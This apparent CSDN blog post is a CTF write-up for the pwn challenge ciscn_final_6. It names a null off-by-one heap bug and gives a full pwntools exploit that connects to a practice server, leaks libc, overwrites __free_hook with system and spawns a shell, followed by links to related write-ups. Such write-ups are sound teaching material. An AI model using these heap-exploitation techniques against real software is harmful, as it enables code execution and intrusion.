ciscn_final_6

最新推荐文章于 2024-07-25 10:00:08 发布
最新推荐文章于 2024-07-25 10:00:08 发布
阅读量391 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106686636
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

ciscn_final_6

首先,检查一下程序的保护机制

然后,我们IDA分析一下,在store_game函数里的getInput存在null off by one漏洞

常规的null off by one漏洞,只是本题逻辑复杂了一点,需要精心构造一下。

#coding:utf8
from pwn import*

#sh = process('./ciscn_final_6')
sh = remote('node3.buuoj.cn',27827)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']

def resume():
   sh.sendlineafter('>','0')

def new_game():
   sh.sendlineafter('>','1')
   sh.sendlineafter("what's your name?","haivk")
   sh.sendlineafter('input you ops count','0')

def load_game(index):
   sh.sendlineafter('>','2')
   sh.sendlineafter('index?',str(index))

def store_game(size = 0,comment = ''):
   sh.sendlineafter('>','3')
   if size == 0:
      sh.sendafter('any comment?','N')
   else:
      sh.sendafter('any comment?','Y')
      sh.sendlineafter('comment size?',str(size))
      sh.sendafter('plz input comment',comment)

def delete_record(index):
   sh.sendlineafter('>','4')
   sh.sendlineafter('index?',str(index))

def show_record():
   sh.sendlineafter('>','5')

#0
new_game()
store_game(0xF0,'a'*0xF0)
#1
new_game()
store_game()
#2
new_game()
store_game(0xF0,'a'*0xF0)
#3~9
for i in range(7):
   new_game()
   store_game(0xF0,'a'*0xF0)
#10
new_game()
store_game()
#11
new_game()
store_game()
#12
new_game()
store_game()

for i in range(3,10):
   delete_record(i)

delete_record(0)
delete_record(2)
#0、2~7
for i in range(7):
   new_game()
   store_game(0xF0,'a'*0xF0)

delete_record(10)
#8
new_game()
store_game(0xF0,'a'*0xF0)
#9
delete_record(11)
new_game()
store_game(0xF0,'a'*0xF0)
#10
delete_record(12)
new_game()
#null off by one
store_game(0x18,'a'*0x10 + p64(0x100 + 0x20 + 0x30 + 0x20 + 0x30))
#填满tcache bin
delete_record(0)
for i in range(2,8):
   delete_record(i)
#合并,形成overlap chunk
delete_record(9)
delete_record(8)
#0、2~7
for i in range(7):
   new_game()
   store_game(0xF0,'a'*0xF0)
#8,将glibc指针移动到下一个chunk
new_game()
store_game(0xF0,'a'*0xF0)

load_game(1)
sh.recvuntil('X:')
main_arena_xx = int(sh.recvuntil(',',drop = True))
sh.recvuntil('Y:')
main_arena_xx = main_arena_xx + (int(sh.recvuntil(';',drop = True)) << 32)
sh.sendlineafter('input you ops count','0')
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
#9
new_game()
store_game(0x60,'/bin/sh'.ljust(0x40,'\x00') + p64(0) + p64(0x31) + p64(free_hook_addr) + '\n')
#10
#写free_hook
new_game()
store_game(0x20,p64(system_addr) + '\n')
#getshell
delete_record(9)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN ciscn_2019_final_5(临界条件错误,劫持GOT表项)
weixin_44145820的博客
04-14 983
目录题目分析漏洞分析漏洞利用Exp 题目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这题应该直接改GOT表就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT)改为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本题中还有一个特殊的地方,就是content数组(0x6020e0)...
full_stack_final.zip
08-16
6. **测试**:单元测试和集成测试代码,确保软件功能的正确性。 7. **部署脚本**:如Dockerfile或CloudFormation模板,用于在各种环境中部署应用程序。 全栈开发涵盖了广泛的技能和知识,包括前端开发、后端开发、...
ciscn_2019_s_6
xieyichensss的博客
06-19 356
这道题好坑呜呜。 远程没有doubel free检查,而本地有。 所以我tmd调了一天的脚本 这里我就简单说下思路吧:能做到这道题的师傅都很强 1.保护全开,没有后门函数,就想到改malloc_hook或者free_hook为system函数或者onegadget,这道题的远程没有double free检查。 2.我们要先泄露libc基址,需要用unsorted_bin头为main_arena+88计算。 3.然后就有很多方法getshell了,如1所述。用double free来add堆块到free_ho
CISCN2019 web writeup
stepone4ward的博客
04-25 1966
记录一下萌新的第一次CISCN之旅,这次和队友一起完成了两道web题目(虽然第二题没有什么输出),这次的web题目质量很高,接下来是我对这次比赛解题过程的记录~ web1 访问index.php,可以看到如下界面 右键查看页面源代码 得到了两个提示 1.index.php中可能存在有文件包含的漏洞 2.hint.php存在有提示 首先利用php://filter访问hint.php,修改url...
ciscn_2019_final_2
z1r0的博客
02-10 466
ciscn_2019_final_2 查看保护 在delete这里的话有两个uaf。还开了沙盒,说实话一开始真没什么思路,看了一下ha1vk的wp才知道漏了一init里面的一个非常重要的东西 这里读flag。flag的文件描述符被设置成了666 泄露数据的话也不是很多。几个字节 攻击思路:因为是2.27下,double free泄露出堆的低位地址,利用double free将size改为0x91,这个时候可以tcache attack泄露出main_arena的低位。 libc的这些低位都有了之后接
ciscn_2019_final_3
、moddemod
07-08 641
tcache机制的利用,通过unsorted泄露进而将堆空间开辟到libc中,写__free_hook拿到shell… exp from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def add(idx, size, content): p.sendlineafter('choice >', str(1)) p.sendl.
[BUUCTF]-PWN:ciscn_2019_final_3解析(tcache dup)
2301_79326813的博客
02-15 415
查看保护RELRO保护为FULL,got表不可修改,只能修改hook表了查看ida这里的大致功能为alloc创建堆块(可填充内容)、free释放堆块(但是不清空指针)值得注意的就是创建堆块大小不可以超过0x78(实际大小会对齐)
ciscn_final_5
seaaseesa的博客
04-09 418
ciscn_final_5 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序将下标存储到了堆地址的低4位里 操作的时候再清除低4位地址值。 问题就在于当index为16的时候,低4位已经无法表示了,这就造成了溢出 假如我的堆地址为0x10,我的index为16,那么,经过运算,保存的地址为0x20,这样free的时候,就是free(0x20)。因此,我...
buuoj刷题记录 - ciscn_2019_final_3
qq_34010404的博客
03-25 415
看了大佬们的思路才做出来的,这里只记录一下做题中踩的坑。 1.add函数 2.del函数 free后没有把数组元素标记为0,存在UAF漏洞. 思路是:1.double free 改fd 到 另一个chunk 的首地址处,然后修改chunksize ,原因是程序限制了分配大小为120字节,free到unsorted bin里面。 2.free chunk 到unsorted bin里面 3.double free 修改fd 到第二步中的chunk,之后便可以malloc 到unsorted bin处,然后
ciscn_final_3
seaaseesa的博客
04-09 343
ciscn_final_3 程序给的glibc版本为2.27,存在tcache机制 首先检查一下程序的保护机制 然后,我们用IDA分析一下 Delete功能存在UAF漏洞 程序没有show的功能,但是add时,会显示堆的地址。 为了能够泄露出glibc地址,我们就要依靠这个add时打印的堆地址。我们只要让tcache bin和unsorted bin重合,那么就能通过申请,...
lesson_test_calculator_final.rar_Final Test
09-19
标题 "lesson_test_calculator_final.rar_Final Test" 暗示我们正在处理一个关于软件开发的项目,特别是针对Symbian V3操作系统的一个最终测试版本。这个简易计算器是使用QT4框架在该平台上构建的,目的是作为新手...
FINAL_OFDM_FINAL_OFDM_
10-01
FINAL_OFDMOFDM(Orthogonal Frequency Division Multiplexing)即正交频分复用技术,实际上OFDM是MCM(Multi Carrier Modulation),多载波调制的一种。通过频分复用实现高速串行数据的并行传输
mobilenet0.25_Final.zip
03-16
6. **PyTorch Framework**:“.pth”文件是PyTorch中常用的模型权重保存格式,可以直接加载到PyTorch环境中,用于模型的预测或进一步的微调。 7. **Model Optimization**:通过设置不同的学习率策略、正则化方法...
detection_Resnet50_Final.pth, Resnet50_Final.pth
03-16
6. **使用场景**:结合以上信息,这个模型可能被应用于实时视频分析、自动驾驶、智能监控、无人机导航等需要目标检测的场景。用户可能需要将此模型集成到他们的系统中,通过调用.pth文件加载模型,然后对新的图像或...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 474
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
极速下载!青苹果系统Win7旗舰版:稳定安全!
lihuiyun184291的博客
07-25 395
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
企业如何保证公司内网安全
最新发布
shunyou0526的博客
07-25 309
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1127
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
hwindow_final
11-29
hwindow_final是一个通过改进窗户设计来提高建筑能效的项目。该项目旨在利用智能技术和可持续材料来创造更加节能和环保的窗户系统。hwindow_final项目的关键特点包括高效的隔热和隔音性能、自动调节的智能控制系统、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值